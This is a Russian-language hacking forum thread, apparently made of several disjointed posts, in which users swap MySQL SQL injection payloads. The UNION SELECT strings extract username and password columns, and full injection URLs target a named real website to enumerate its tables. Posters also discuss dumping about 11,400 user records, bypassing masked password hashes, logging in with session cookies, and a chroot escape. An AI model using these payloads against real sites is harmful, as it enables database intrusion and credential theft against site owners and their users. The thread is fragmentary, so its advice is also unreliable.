Если тебе нужно вывести от 1 до 5 колонок СРАЗУ,то limit 1,5 должно помочь )(Мне помогало)

Если нужно вывести записи из конкретных строк или колонок,то:

1+union+select+1,2,3,username,password,6--

или так:

1+union+select+1,2,3,concat_ws(разделите� �ьв HEX,username,password),5,6

или так:

1+union+select+1,2,3,concat(разделитель ,username,разделитель,password,разд елитель)

Если не ошибаюсь,конечно

Это всё работает при MySql.

конкретную запись вывести,тогда так:

1+union+select+1,2,3,4,username,6+from+users+limit +x,1, где х - произвольный номер записи в таблице.

diznt,для того,чтобы грамотно выводилось,нужно всегда объединять поля в таблице.У меня тоже иногда косяки случаются.Выводит тебе Ouknown column,потому что MySql не понял,что перед ним хекс данные - и правильно сделал,так как ты убрал 0x,который и отличает hex от oct (типы данных).В некоторых языках программирования можно и 0 ставить спереди,в некоторых необходимо только 0х.Когда ты пишешь спереди 0x(тут_число в HEX),то он понимает,что перед ним HEX данные,и преобразует их обратно.Так как ты передаёшь данные в кавычках,то он преобразует их в строку.

Ответ будет аналогичен твоему,если ты подставишь в where username='sasasa'.Ошбка та же.

Сам по себе механизм chroot не полностью безопасен. Если программа, запущенная в chroot имеет привилегии root, она может выполнить second chroot для того, чтобы выбраться наружу. Это работает потому, что некоторые ядра Unix не позволяют правильного вложения контекстов chroot.

А как вообще другой пользователь запустит программу с привилегиями root ?
Распространяется ли chroot на подкаталоги того каталога,куда установлена система ?

Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--

А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--

Где грабли?

На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте.
Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в *
Вот скрин как выглядит вывод.
Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..

CTRL+A

а вообще сдался тебе этот лимит:

или так:

RedX, добавь в аддишнал хедерс свои куки (в сипте).

Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Я так понимаю, это закриптованные логин и пасс?

через SIPT никак, в отношении POST запросов он багганый шо писец, сам хотел через него работать.
Чуть позже я выложу много-поточный скрипт для вывода через POST запросы.